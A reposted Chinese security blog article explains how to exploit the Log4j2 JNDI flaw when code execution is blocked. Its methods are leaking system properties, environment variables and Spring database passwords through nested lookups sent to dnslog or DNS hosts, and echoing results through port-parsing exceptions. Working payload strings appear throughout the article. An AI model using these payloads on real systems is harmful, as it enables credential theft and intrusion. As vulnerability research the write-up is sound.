浅谈Log4j2信息泄露与不出网回显

已于 2023-07-21 13:59:08 修改
阅读量748 收藏 1
点赞数
文章标签: log4j java 单元测试
于 2023-07-21 13:58:30 首次发布
原文链接:https://developer.aliyun.com/article/1160447
版权

简介: 浅谈Log4j2信息泄露与不出网回显

介绍

本文核心是探讨:由于各种情况(RASP和SecurityManager等)导致无法RCE时候如何利用Log4j2

最近在赛博回忆录看到很多大佬提出Log4j2的利用姿势,本文也是参考各位大佬(比如浅蓝大佬)的成果做个总结

昨天看到P师傅凌晨三点还在研究Log4j2在ES中的利用,P牛指出:

ElasticSearch利用Java的SecurityManager安全机制来防御文件操作和Socket操作,所以无法正常连接远程服务器

这种情况也说明了研究Log4j2非RCE利用方式的必要性

信息泄露需要两个关键点

  • 如何获取泄露的信息
  • 如何带出来泄露的信息

解决

  • 获取:利用${}和其他各种Lookup
  • 带出:利用dnslog或直接dns协议

嵌套标签

参考Payload

${jndi:ldap://${java:version}.u2xf5m.dnslog.cn}

Log4j2是在substitute方法中递归解析${}表达式,所以可以利用这种嵌套标签,从内到外获取${}中的内容,然后分配给对应的Lookup做解析,获得信息后通过Dnslog带出

借用木头师傅的图片展示效果

cd6d2e5aee264977a048659bc3fdfbb3_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

Sys与Env

之所以专门提到这两个Lookup是因为他们之中通常包含着关键信息

信息来自于System.getProperty()和System.getenv()

具体能获取哪些信息可以参考某位师傅的仓库:GitHub - jas502n/Log4j2-CVE-2021-44228: Remote Code Injection In Log4j

208562c9952cad0c71c5bf6ded9986e9_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

Bundle

在浅蓝师傅的文章中提到的一种特殊Lookup

源码的BundleLookup核心内容如下

public String lookup(final LogEvent event, final String key) {
  ...
   final String bundleName = keys[0];
   final String bundleKey = keys[1];
  ...
   return ResourceBundle.getBundle(bundleName).getString(bundleKey);
}

在通常情况下这个ResourceBundle被用来做国际化,网站通常会给一段表述的内容翻译成多种语言

在SpringBoot下可能会获取到关键信息,将会比Sys和Env更严重

但这种情况略显鸡肋,需要手动排除SpringBoot自带的日志依赖并加入Log4j2的依赖(这种情况可能不多)

<dependency>
   <groupId>org.springframework.boot</groupId>
   <artifactId>spring-boot-starter</artifactId>
   <exclusions>
       <exclusion>
           <groupId>org.springframework.boot</groupId>
           <artifactId>spring-boot-starter-logging</artifactId>
       </exclusion>
   </exclusions>
</dependency>
<dependency>
   <groupId>org.springframework.boot</groupId>
   <artifactId>spring-boot-starter-log4j2</artifactId>
</dependency>

通过${bundle:application:spring.datasource.password}可以直接拿到数据库密码

如果不需要手动排除默认日志依赖即可获取信息,那么这将会是严重的漏洞,但目前的情况不算很严重

dc856c52be0877add2af2e7091ab6624_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

嵌入标签即可带到Dnslog

ca7d0cf912a60acde2a81ac86aea4f3b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

DNS

DNS协议是属于JNDI协议的,所以我们也可以利用DNS协议来带一些信息

使用logg.error("${jndi:dns://xxxxx:8090/${java:version}}");

在自己的VPS上nc -luvvp 8090即可收到信息(参考木头师傅图片)

920540e5193f569a32b47ae75576c821_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

不出网回显

很多群都在讨论Log4j2不出网的利用,主要参考浅蓝师傅给出的思路

这是一种报错回显,在log整体流程中有下面这样一部,具体流程参考Log4j2分析文章

在tryCallAppender方法中catch了RuntimeException

private void tryCallAppender(final LogEvent event) {
   try {
       appender.append(event);
  } catch (final RuntimeException error) {
       handleAppenderError(event, error);
  } catch (final Exception error) {
       handleAppenderError(event, new AppenderLoggingException(error));
  }
}

如果配置了ignoreExceptions选项,就会直接抛出来

private void handleAppenderError(final LogEvent event, final RuntimeException ex) {
   appender.getHandler().error(createErrorMsg("An exception occurred processing Appender "), event, ex);
   if (!appender.ignoreExceptions()) {
       throw ex;
  }
}

接下来就是制造RuntimeException

例如字符串转数字中有一个NumberFormatException异常,它父类的父类是RuntimeException

public class NumberFormatException extends IllegalArgumentException {}
public class IllegalArgumentException extends RuntimeException {}

JndiManager.lookup中name是protocal://host:port/path

其中port本该是int如果给它无法转int的字符串就会抛出这里的信息

又联想到${}是支持嵌套标签的,这里嵌入真正想要得到的结果,即可抛出执行结果

根据这个思路,成功在Tomcat项目中回显执行结果(例如这里的${java:version})

能够回显的Payload是这样:${jndi:ldap://x.x.x.x:${java:version}/xxx}

d830a84b3898c91524413a1385b769f4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

浅蓝师傅的思路是来自于端口字符串强转int报错来回显

在log4j2.xml中开启配置:ignoreExceptions="false"

<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="warn" name="MyApp" packages="">
   <Appenders>
       <Console name="STDOUT" target="SYSTEM_OUT" ignoreExceptions="false">
           <PatternLayout pattern="%m%n"/>
       </Console>
   </Appenders>
   <Loggers>
       <Root level="error">
           <AppenderRef ref="STDOUT"/>
       </Root>
   </Loggers>
</Configuration>

在实际的环境中,有开启这个配置的概率,参考apache官方的描述

大致意思是在FailoverAppender情况下必须设置该选项为false

某些情况下开发者想让错误报出来便于调试,也会故意开启这个选项

ignoreExceptions:
The default is true, causing exceptions encountered while appending events to be internally logged and then ignored. When set to false exceptions will be propagated to the caller, instead. You must set this to false when wrapping this Appender in a FailoverAppender.

再Tomcat中使用Log4j2的配置文件需要修改web.xml

<listener>
   <listener-class>org.apache.logging.log4j.web.Log4jServletContextListener</listener-class>
</listener>

<filter>
   <filter-name>log4jServletFilter</filter-name>
   <filter-class>org.apache.logging.log4j.web.Log4jServletFilter</filter-class>
</filter>
<context-param>
   <param-name>log4jConfiguration</param-name>
   <param-value>file:///YOUR_LOG4J2.XML_PATH</param-value>
</context-param>
<filter-mapping>
   <filter-name>log4jServletFilter</filter-name>
   <url-pattern>/*</url-pattern>
   <dispatcher>REQUEST</dispatcher>
   <dispatcher>FORWARD</dispatcher>
   <dispatcher>INCLUDE</dispatcher>
   <dispatcher>ERROR</dispatcher>
   <dispatcher>ASYNC</dispatcher>
</filter-mapping>

来个Servlet即可触发

@WebServlet("/test")
public class DemoServlet extends HttpServlet {
   private static final Logger logger = LogManager.getLogger();
   @Override
   protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
       logger.error("${jndi:ldap://127.0.0.1:${java:runtime}/badClassName}");
  }
}

参考

参考浅蓝师傅的文章:https://mp.weixin.qq.com/s/vAE89A5wKrc-YnvTr0qaNg

参考天下大木头师傅的图片:KpLi0rn (天下大木头) · GitHub

版权声明:网络资源转载,侵权立删阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

关云chnag
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Elasticsearch与最新的log4j2零日漏洞
点火三周的专栏
12-12 7009
今天真的是焦头烂额,新出来的这个log4j2零日漏洞看起来杀伤力极大,影响了Apache Struts2, Apache Solr, Apache Druid, Apache Flink等重量级的开源项目。当然也包括我们的Elasticsearch。在官方正式的通告、解决方案,补丁出来之前,我这里先简答说一下我个人的测试结果(注意,不代表官方!) 划重点: 我个人的测试结果是:只有ES 5+JDK8能复现。ES 5+JDK12,ES 6+JDK8,ES 7+JDK8均无法进行远程代码执行 测试方案: 使用
Log4j2的循环队列引起的内存泄露
百川到东海
04-01 3029
一、问题产生背景 线上突然产生高并发且大报文交易,应用采用log4j2打印了大报文日志,引起了内存泄露。 二、排查 分析heapdump文件,发现主要被log4j2的RingBuffer占用。 三、原因 log4j2为提高吞吐速率采用循环队列缓存将要打印的日志,随后采用异步线程“消费”队列内容。 当高并发大量日志打印的过程中,会导致内存占用过高。 四、处理 在启动脚本中配置启动参数:-DAsyncLoggerConfig.RingBufferSize=4096 (该参数默认是256k,指循.
记一次疑似JVM内存泄漏的排查过程
最新发布
京东科技开发者
06-04 1012
由于篇幅及时间问题,我们没有做本地的压测对比,暂借用官网的一个压测结果,可以看到log4j的Garbage-free特性还是对应用的性能还是有很大的提升,所以不建议用上面的解决方案1来放弃使用异步日志的Garbage-free特性。我们最后选择的是方案3,通过打印日志内容长度,同时对日志进行了截断,只打印前256个字符。实际的日志打印内容,日志内容是被截断的。上线后的堆内存监控图,没有再出现多次YGC后堆内存逐步上涨的情况。
log4j2 full gc频繁 disruptor 队列 内存泄漏 内存溢出
九二战歌的博客
05-06 2305
去年10月份生产环境服务出了点问题,现象是运行一段时间后,full gc非常频繁,从监控上看,基本上每分钟都在执行,本篇博客就纯当记录一下当时的解决过程。说到底还是博主太菜了,只知道复制粘贴,导致很多机制都不了解。
记录一次log4j2导致的内存泄漏
热门推荐
玩家六的专栏
02-18 1万+
线上服务突然告警,jvm疯狂触发老年代gc,登录后台查看gc并不能释放老年代空间,之前这个服务一直正常运行了几个月,第一时间下载jvm的dump文件,并对服务重启,防止内存不足影响线上业务。 使用MAT分析dump文件,先按照retained Heap排序, 发现ThreadLocal 和StringBuilder这两个类占用了大量内存,ThreadLocal也是引用的StringBuilder,...
浅谈Log4j2无法rce的利用:信息泄露与不出网回显
weixin_50464560的博客
05-01 3622
https://xz.aliyun.com/t/10659 0x00 介绍 本文核心是探讨:由于各种情况(RASP和SecurityManager等)导致无法RCE时候如何利用Log4j2 最近在赛博回忆录看到很多大佬提出Log4j2的利用姿势,本文也是参考各位大佬(比如浅蓝大佬)的成果做个总结 昨天看到P师傅凌晨三点还在研究Log4j2在ES中的利用,P牛指出: ElasticSearch利用Java的SecurityManager安全机制来防御文件操作和Socket操作,所以无法正常连接远程服
fastjson-c3p0:fastjson不出网回显利用
03-19
fastjson不出网回显利用 POST /json HTTP/1.1 Host: 127.0.0.1:8999 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0....
Android手机卫士之获取联系人信息显示与回显
09-01
在Android开发中,获取并显示联系人信息是常见的功能,特别是在构建类似手机卫士的应用时。本篇将详细讲解如何实现这一过程。 首先,Android系统提供了ContentProvider接口,用于访问和共享应用程序的数据,包括...
select2控件回显方法
09-12
JavaScript 技术: select2控件选择多个数据,以及回显数据的方法 。
瑞萨RA4M2实现UART收发回显(FSP库驱动).zip
02-17
瑞萨RA4M2驱动程序,Keil开发环境,FSP库驱动。 项目代码可直接编译运行~
瑞萨RA4M2实现环形队列的UART收发回显(FSP库驱动).zip
03-23
在本文中,我们将深入探讨如何在瑞萨RA4M2微控制器上利用Keil开发环境和FSP(Fast Software Package)库驱动实现环形队列的UART(通用异步接收发送器)收发回显功能。瑞萨RA4M2是一款高性能、低功耗的微控制器,广泛...
log4j2-elasticsearch:Log4j2 Elasticsearch Appender插件
03-04
log4j2-elasticsearch概述 这是log4j2附加程序插件的父项目,能够将日志批量推送到Elasticsearch集群。 最新发布的代码(1.5.x)可用。 项目包括: log4j2-elasticsearch-core实现的框架提供程序 log4j2-elasticsearch-hc与Elasticsearch 2.x,5.x,6.x和7.x集群兼容的优化Apache Async HTTP客户端 log4j2-elasticsearch-jest与Elasticsearch 2.x,5.x,6.x和7.x集群兼容的 log4j2-elasticsearch2-bulkprocessor与2.x群集兼容的 log4j2-elasticsearch5-bulkprocessor与5.x和6.x集群兼容的 log4j2-elasticsearch6-bulkproces
Log4j2漏洞利用
weixin_52515588的博客
12-30 880
升级到最新的安全版本:log4j2-2.15.0-rc2。选用JNDI注入工具:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar。这里的命令是想要靶机运行的命令,-A 后放的是发出攻击的电脑的IP,也是存放-C后”命令”的IP地址。【我直接下载连接失败,就下载好了以后拉进来的,如果是直接下载的去对应目录下面找】在漏洞已存在的情况下,构造攻击payload执行命令反弹shell。监听界面出现反弹shell成功的界面:(进入了交互模式)实现反弹shell,可以使用命令。
log4j2漏洞简单复现
BING
06-06 3006
log4j2漏洞简单复现
关于1种log4j2漏洞利用
weixin_56061250的博客
01-18 2575
关于1种log4j2漏洞利用
log4j2 漏洞的简单利用
qq_40448491的博客
12-11 7227
情报:【不容错过】史诗级Log4j漏洞!相关详情X社区持续更新中! 受影响版本 :2.x<=2.14.1 依赖: <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-api</artifactId> <version>2.14.1</
log4j2实战复现
qq_41860201的博客
02-11 4497
去年爆出的log4j2漏洞,写一个实战利用的复现笔记,找了几个靶场作为复现靶机。 一、靶场地址:https://hack.zkaq.cn/battle/target?id=5a768e0ca6938ffd 靶场环境: 环境是: SpringBoot版本 2.6.1 log4j版本 2.14.1 java8 先抓个登录包,看一下参数 username和password参数中尝试jndi注入 2、用自己的vps开启ldap和web服务,这里直接使用工具JNDIExploit.v1.2 ..
log4j2漏洞原理详解、漏洞复现及漏洞利用
Cwillchris的博客
03-13 1367
虽然/dev/tcp/${HOST}/${PORT}这个字符虽然看起来像一个文件系统中的文件,并且位于/dev这个设备文件夹下,但是这个文件并不存在,并且不是一个设备文件。这只是 bash 实现的用来实现网络请求的一个接口,其实就像我们自己编写的一个命令行程序,按照指定的格式输入 host port 参数,就能发起一个 socket 连接。这两组重定向,将输入,输出,报错信息都输入到/dev/tcp/192.168.1.3/6666 这里了,就相当于把整个 shell 会话,都重定向到 tcp 连接中了。
elk7.6综合案例对log4j2日志收集过滤统分析(elasticsearch7.6.X+beats+logstash7.6.X+kibana)
qq_28807077的博客
11-20 418
教学视频:https://www.bilibili.com/video/av95508270/
log4j2漏洞在线复现
10-05
log4j2是一个Java日志框架,用于记录应用程序的日志信息。它具有广泛的应用,但最近发现了一个远程代码执行漏洞(CVE-2021-44228)。该漏洞允许攻击者通过恶意构造的日志信息来执行任意代码。 要在线复现log4j2漏洞,您可以按照以下步骤进行操作: 1. 编写一个Java类,包含恶意代码,例如上述提供的POC。 2. 确保您的Java环境中安装了受漏洞影响的log4j2版本。 3. 运行该Java类,并触发日志记录操作。 4. 检查DNSLog平台或其他相关工具,以查看是否有恶意代码的执行回显。 请注意,在执行漏洞复现之前,确保您已经获得合法授权,并遵守法律和道德准则。漏洞复现仅用于安全研究和教育目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值